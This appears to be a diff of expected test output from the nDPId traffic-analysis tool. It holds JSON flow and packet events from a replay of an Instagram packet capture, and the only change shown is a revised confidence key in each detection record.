JTxfNNwpu5Mu42yT2kpORmWxKLjzXxHI3WY0zq00CLVkZ1W4ZdSNXs14xkPKnh8GETvWNyrC0OkJAC\/senhsF4RXOoqIV\/fvDhI7Lz\/aB3VqgZGkZTiT2tG0nkNbTl36TNhCL0NMIpdEkg3CtkeHnRpYXxlFUaqjl0oiNlqmXrT3txeOlkpgLeE8sil6hQeUXLUDxeB\/KJ3hVWQV57tvquoi3TQ0mdlDPh3nKxwFekfGvexzie5JWVEiecROjBicDHlMGZSqgfGOOL9obBhKFQKyGkKwqvDD0GLpn+uVlqpq4HgYehGmZsXkGfKjhOvgYnCN46aHecrF2yix3uKy9HcGVhEh0jdkP6ZVKeYPjfh1VormnzwC798pJrA6FXeukKkQhENaxtIfjtfZqrhxgkGn44Wi6ohn6pe\/FHHmbNcPgV6V8fsqp75GNTcdW4payqjcXiRcbHyE8T1\/Qx4baiJDp6KLsZS4gAneRh+ALhxukKM03jbRUClXAh8oRiLl0u+SOlflfwh8goOCkzbht0yzBBd5s+YE\/rKLvLODamT6vRSajD988ioyLCTi6O7PjCpIz0x86CPfl59RFLMWfW1DDNxLLiQpG5QmdGA\/0xKZPtgucNxJfMg8zisuAsBotSOZNTt7iyYW\/IMjbjZfUDk2XnW0FMevjvN1dNSzxncEScDgEwhOZR\/bPFjnmrDfWVV5x9BRHI5MP8wUwSlhypizc+qxTGIgicImjYGkhAIz+xcFmXadM0YNZEvMZaj9aBOHMX1Oble6EYxmSHOrpQKqfzbWeMlvwrQYuci0kLy\/\/bshVduwlDBy5JYqDunQnZyDGNhNVfyaH+ng8KQ6sBqINnITFXfAn
CkwXV\/HK1iUkb7QzoqBn3gpftCp83hNH0foudA8Gdf6kurlWwgMEOXi5BfTqlD4DwASXt9A68u1P9Zz8s0alrX2UlusB6fvL9Q9Js6MLwiQyj+bjdEcQ3Uplwrw6qLdouhHzsdgkMnVdwc2l5wv8KPOcXqmQvqjndZFz1nXaAVhwsFoo1zwY3LiNiYjhwWSYaeCHLdPVBHtAjW1OZFou+zyYe9X36AFhBBqrW+04QrWGvIhn1jD27wWhOa1bAC4ScjrpH0lKPe5njeedOXaKkZFE++EHilCzyFRBq6mDF3sb10u4yUIsQcfD4LLSh"} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898386,"flow_last_seen":1436720898386,"flow_idle_time":7580000,"flow_min_l4_payload_len":1365,"flow_max_l4_payload_len":1365,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":1365,"midstream":1,"thread_ts_msec":1436720898386,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898386,"flow_last_seen":1436720898386,"flow_idle_time":7580000,"flow_min_l4_payload_len":1365,"flow_max_l4_payload_len":1365,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":1365,"midstream":1,"thread_ts_msec":1436720898386,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1436720898475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720898475,"pkt":"QPMIw47hABsv8H60CABFAAA05iNAAFUGAlAfDV00wKgAZwG7hJCk1JOYiMGTh4AQAE5t9QAAAQEIClpSq0YAA+qL"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1436720898499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720898499,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAAFIGTqyt\/GsEwKgAZwG73D5XFMWUHoSlo6ASOJBK1AAAAgQFlgQCCAq8TYT0AAPqiAEDAwg="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1436720898499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720898499,"pkt":"ABsv8H60QPMIw47hCABFAAA0TytAAEAGEYnAqABnrfxrBNw+AbsehKWjVxTFlYAQAOXaNgAAAQEICgAD6pe8TYT0"} -00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720898354,"flow_last_seen":1436720898501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1436720898501,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720898354,"flow_last_seen":1436720898501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1436720898501,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
01299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1436720898551,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":679,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":679,"pkt_l4_len":645,"thread_ts_msec":1436720898551,"pkt":"QPMIw47hABsv8H60CABFAAKZ5iRAAFUG\/+kfDV00wKgAZwG7hJCk1JOYiMGTh4AYAE6DfwAAAQEIClpSq5UAA+qLFwMBAmB3TNLiDxMdaG\/77FJR8O6B7ETM5PL1YEwRicjM0iP0UHaAjwUM69tZJRboKPSJSylQ1372woiRMUoGT0dkqivXwS77nykGpDpQxH2zG\/qLmXj10Apbm9mNJzojbuGkVAQeXciVaLovJfxV8pe4ApuOMtqX+wzNa0ZzIxrRfdGy1r+REoc96\/duttzeccU7r8F+0sSj4kAMBptpjPxHIWmQ8bvcQmsOZTBbtWqbInBydwnOzZKHuUG4UpWsNoKQLrxSa1ETAsjugoyEe5PPT8+cb8Irh4mKsNfbStX5KDjpe9Dme8aKUCL1ceYHHjALeMY9l4fx2o0KIF6TukGkzvqR8cZ+qcyDG5U\/HYh5lxYTcHS7lDXS1PzV6XOR41h1cZ9L+KxXE6JczRHCSiNT1VF7boI4Qizj5lEdfdajhSQHOEg16UAhsZHpgK1G5Iki1ek6rdWyUqwchJMZYUThaRdJpKv9RM0OW9cAtKW4cZKenq0TEdOPDEBRCwskRboA6Gi3YnhJ3qdvDGkTLGo9t+FpkGczAZZn4gKC4xoEybQb10OFqFb4BP0BHlc1dmzqbYjWeEKW2wJjaNEaqdUvlusDaKzJPAfd\/FC3qcdqBy6RoP1rw6AWfXgFirXb5SF1IsZGaICO7Vi\/A05NBIj2TN+sAkrMTvlnJxzijI3OS4z\/O7pdS0yJ1AhdM2CbNqiTSP1\/fSWG2i895LYIERx7TAiABxyhh9ufac6WLn1D9wJV86snpuHfJEPWipx7pSJs20IjfVBIUe\/onrcoOjL6GotP95FotxVNOdpbLqczmpv1mQ=="} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720898354,"flow_last_seen":1436720898646,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1436720898646,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": 
{"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"acb741bcdffb787c5a52654c78645bdf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -00661{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"thread_ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720898354,"flow_last_seen":1436720898646,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1436720898646,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"acb741bcdffb787c5a52654c78645bdf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +00661{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"thread_ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00819{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1436720900684,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1436720900684,"pkt":"ABsv8H60QPMIw47hCABFAAE4wXBAAEAGQn\/AqABnLiFGoJegAFCP9SVkp0jV34AYH+olJAAAAQEICgAD63Ga3vWjR0VUIC9ocGhvdG9zLWFrLXhhcDEvdDUxLjI4ODUtMTUvZTM1LzEwODU5OTk0XzEwMDk0MzM3OTI0MzQ0NDdfMTYyNzY0NjA2Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtaC5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-h.ak.instagram.com","url":"photos-h.ak.instagram.com\/hphotos-ak-xap1\/t51.2885-15\/e35\/10859994_1009433792434447_1627646062_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
+00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-h.ak.instagram.com","url":"photos-h.ak.instagram.com\/hphotos-ak-xap1\/t51.2885-15\/e35\/10859994_1009433792434447_1627646062_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7580000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00810{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1436720900687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":319,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":319,"pkt_l4_len":285,"thread_ts_msec":1436720900687,"pkt":"ABsv8H60QPMIw47hCABFAAEx0CVAAEAGO5vAqABnUlUaouJQAFA6kgvvKZIczIAYH0cqkQAAAQEICgAD63FWCuc2R0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTE1LzExMzg2NTI0XzExMDI1NzYxOTMxNzQzMF8zNzk1MTM2NTRfbi5qcGcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1nLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7580000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e15\/11386524_110257619317430_379513654_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
+00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7580000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e15\/11386524_110257619317430_379513654_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7580000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1436720900690,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"thread_ts_msec":1436720900690,"pkt":"ABsv8H60QPMIw47hCABFAAE3v7dAAEAGS+vAqABnUlUauq1bAFCj1oFKfMvpWoAYDTz8dgAAAQEICgAD63JUYaBjR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExMzc5MTQ4XzE0NDkxMjAyMjg3NDUzMTZfNjA3NDc3OTYyX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1lLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7580000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
+00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7580000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7580000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1436720900692,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"thread_ts_msec":1436720900692,"pkt":"ABsv8H60QPMIw47hCABFAAE3iBFAAEAGg5LAqABnUlUaueJtAFAE8EMOWjfyZYAYD+bdMQAAAQEICgAD63JZ6ogYR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExNDI0NjIzXzE2MDgxNjMxMDk0NTA0MjFfNjYzMzE1ODgzX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1mLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7580000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
+00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7580000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 